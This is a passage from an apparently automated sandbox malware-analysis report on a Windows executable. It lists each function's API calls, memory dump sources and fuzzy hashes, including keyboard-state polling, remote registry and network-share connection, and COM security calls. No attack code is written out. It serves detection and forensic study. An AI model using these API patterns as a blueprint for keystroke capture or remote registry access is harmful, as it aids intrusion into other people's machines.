                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 455036304-4153970271
                                                                                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                              Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                              • _memmove.LIBCMT ref: 00467EB8
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                              • _memmove.LIBCMT ref: 00467F6C
                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2170234536-0
                                                                                              • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                              • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                              Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                              • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                              • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                              • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                              • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                              Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                              Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                              • DeleteObject.GDI32(?), ref: 0047151E
                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                              • DeleteObject.GDI32(?), ref: 004715EA
                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3218148540-0
                                                                                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                              Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                              • String ID:
                                                                                              • API String ID: 136442275-0
                                                                                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                              Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsncpy.LIBCMT ref: 00467490
                                                                                              • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • _wcstok.LIBCMT ref: 004674FF
                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                              • String ID: X
                                                                                              • API String ID: 3104067586-3081909835
                                                                                              • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                              • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                              Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                              • _wcslen.LIBCMT ref: 0046CDB0
                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                              Strings
                                                                                              • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                              • String ID: NULL Pointer assignment
                                                                                              • API String ID: 440038798-2785691316
                                                                                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                              Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                              • _wcslen.LIBCMT ref: 004610A3
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                              • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                              • String ID: ThumbnailClass
                                                                                              • API String ID: 4136854206-1241985126
                                                                                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                              Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                              • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                              • String ID: 2
                                                                                              • API String ID: 1331449709-450215437
                                                                                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                              Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                              • __swprintf.LIBCMT ref: 00460915
                                                                                              • __swprintf.LIBCMT ref: 0046092D
                                                                                              • _wprintf.LIBCMT ref: 004609E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                              • API String ID: 3054410614-2561132961
                                                                                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                              Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
